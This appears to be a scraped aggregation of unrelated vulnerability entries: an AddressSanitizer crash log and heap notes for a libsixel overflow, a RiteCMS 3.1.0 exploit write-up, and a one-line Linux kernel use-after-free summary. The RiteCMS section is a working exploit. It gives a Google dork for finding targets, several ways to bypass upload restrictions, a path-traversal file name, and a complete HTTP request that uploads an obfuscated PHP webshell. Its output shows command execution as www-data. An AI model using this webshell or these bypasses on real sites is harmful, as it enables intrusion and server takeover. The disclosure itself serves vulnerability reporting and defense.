        #7 0x7ffff752b5cb in sixel_helper_load_image_file /home/wulearn/Desktop/testtt/libsixel/src/loader.c:1418
        #8 0x7ffff753b513 in sixel_encoder_encode /home/wulearn/Desktop/testtt/libsixel/src/encoder.c:1743
        #9 0x555555558a3b in main /home/wulearn/Desktop/testtt/libsixel/converters/img2sixel.c:457
        #10 0x7ffff72c60b2 in __libc_start_main (/usr/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow /home/wulearn/Desktop/testtt/libsixel/src/quant.c:876 in error_diffuse
    Shadow bytes around the buggy address:
      0x0c5c7fff9820: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c5c7fff9830: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c5c7fff9840: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c5c7fff9850: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c5c7fff9860: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    =>0x0c5c7fff9870: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa[fa]
      0x0c5c7fff9880: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c5c7fff9890: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c5c7fff98a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c5c7fff98b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c5c7fff98c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==2216856==ABORTING
    
    

It happens in:  

error\_diffuse(data, pos + width \* 1 - 2, depth, error, 1, 24);

when x=0, y=0, width=1,then

gdb info:  
![image](https://user-images.githubusercontent.com/43570004/131661031-3f3ff180-cf8f-409b-a54b-df4b885f4d2c.png)

In this position,\[r13+rcx\*1+0x0\] will be `0x100000000000f7e6d` =>`0xf7e6d`  
So,writing to data will cause `overflow`  
and then it writes to a location (chunk) in the heap that should not be written to.

heap info:  
Before:

    0xf5fda0            0x0                 0x60                 Freed                0x0              None
    0xf5fe00            0x0                 0x8060               Used                None              None
    0xf67e60            0x0                 0x70                 Used                None              None
    0xf67ed0            0x0                 0x30                 Used                None              None
    0xf67f00            0x0                 0x10010              Used                None              None
    0xf77f10            0x0                 0x7eb0               Freed     0x7ffff7c9cbe0    0x7ffff7c9cbe0
    0xf7fdc0            0x7eb0              0xd0                 Freed                0x0              None
    
    

After:

    0xf5fda0            0x0                 0x60                 Freed                0x0              None
    0xf5fe00            0x0                 0x8060               Used                None              None
    Corrupt ?!

CVE-2022-27044: heap-buffer-overflow in libsixel/src/quant.c:876 · Issue #156 · saitoha/libsixel

RiteCMS version 3.1.0 and below suffers from a remote code execution vulnerability in the admin panel. An authenticated attacker can upload a PHP file and bypass the .htacess configuration to deny execution of .php files in media and files directory by default.

\# Exploit Title: RiteCMS - File Upload Restriction Bypass to Remote Code Execution (Authenticated) \# Date: 2021-07-25 \# Exploit Author: faisalfs10x (https://github.com/faisalfs10x) \# Vendor Homepage: https://ritecms.com/ \# Software Link: https://github.com/handylulu/RiteCMS/releases/download/V3.1.0/ritecms.v3.1.0.zip \# Version: <= 3.1.0 \# Tested on: Windows 10, Ubuntu 18, XAMPP \# Google Dork: intext:"Powered by RiteCMS" \# Reference: https://gist.github.com/faisalfs10x/bd12e9abefb0d44f020bf297a14a4597 """ ################ \# Description # ################ \# RiteCMS version 3.1.0 and below suffers from a remote code execution in admin panel. An authenticated attacker can upload a php file and bypass the .htacess configuration that deny execution of .php files in media and files directory by default. \# There are 4 ways of bypassing the current file upload protection to achieve remote code execution. \# Method 1: Delete the .htaccess file in the media and files directory through the files manager module and then upload the php file - RCE achieved \# Method 2: Rename .php file extension to .pHp or any except ".php", eg shell.pHp and upload the shell.pHp file - RCE achieved \# Method 3: Chain with Arbitrary File Overwrite vulnerability by uploading .php file to web root because .php execution is allow in web root - RCE achieved By default, attacker can only upload image in media and files directory only - Arbitrary File Overwrite vulnerability. Intercept the request, modify file\_name param and place this payload "../webrootExec.php" to upload the php file to web root body= Content-Disposition: form-data; name="file\_name" body= ../webrootExec.php So, webshell can be accessed in web root via http://localhost/ritecms.v3.1.0/webrootExec.php \# Method 4: Upload new .htaccess to overwrite the old one with content like below for allowing access to one specific php file named "webshell.php" - RCE achieved $ cat .htaccess <Files \*.php> deny from all </Files> <Files ~ "webshell\\.php$"> Allow from all </Files> ################################### \# PoC for webshell using Method 2 # ################################### Steps to Reproduce: 1\. Login as admin 2\. Go to Files Manager 3\. Choose a directory to upload .php file either media or files directory. 4\. Then, click Upload file > Browse.. 3\. Upload .php file with extension of pHp, eg webshell.pHp - to bypass .htaccess 4\. The webshell.pHp is available at http://localhost/ritecms.v3.1.0/media/webshell.pHp - if you choose media directory else switch to files directory Request: \======== POST /ritecms.v3.1.0/admin.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,\*/\*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------410923806710384479662671954309 Content-Length: 1744 Origin: http://localhost DNT: 1 Connection: close Referer: http://localhost/ritecms.v3.1.0/admin.php?mode=filemanager&action=upload&directory=media Cookie: PHPSESSID=vs8iq0oekpi8tip402mk548t84 Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Sec-GPC: 1 \-----------------------------410923806710384479662671954309 Content-Disposition: form-data; name="mode" filemanager \-----------------------------410923806710384479662671954309 Content-Disposition: form-data; name="file"; filename="webshell.pHp" Content-Type: application/octet-stream <?php system($\_GET\[base64\_decode('Y21k')\]);?> \-----------------------------410923806710384479662671954309 Content-Disposition: form-data; name="directory" media \-----------------------------410923806710384479662671954309 Content-Disposition: form-data; name="file\_name" \-----------------------------410923806710384479662671954309 Content-Disposition: form-data; name="upload\_mode" 1 \-----------------------------410923806710384479662671954309 Content-Disposition: form-data; name="resize\_xy" x \-----------------------------410923806710384479662671954309 Content-Disposition: form-data; name="resize" 640 \-----------------------------410923806710384479662671954309 Content-Disposition: form-data; name="compression" 80 \-----------------------------410923806710384479662671954309 Content-Disposition: form-data; name="thumbnail\_resize\_xy" x \-----------------------------410923806710384479662671954309 Content-Disposition: form-data; name="thumbnail\_resize" 150 \-----------------------------410923806710384479662671954309 Content-Disposition: form-data; name="thumbnail\_compression" 70 \-----------------------------410923806710384479662671954309 Content-Disposition: form-data; name="upload\_file\_submit" OK - Upload file \-----------------------------410923806710384479662671954309-- #################### \# Webshell access: # #################### \# Webshell access via: PoC: http://localhost/ritecms.v3.1.0/media/webshell.pHp?cmd=id \# Output: uid=33(www-data) gid=33(www-data) groups=33(www-data) """

CVE-2021-46367: RiteCMS version 3.1.0 suffers from a remote code execution in admin panel

jbd2_journal_wait_updates in fs/jbd2/transaction.c in the Linux kernel before 5.17.1 has a use-after-free caused by a transaction_t race condition.

Tag

#ubuntu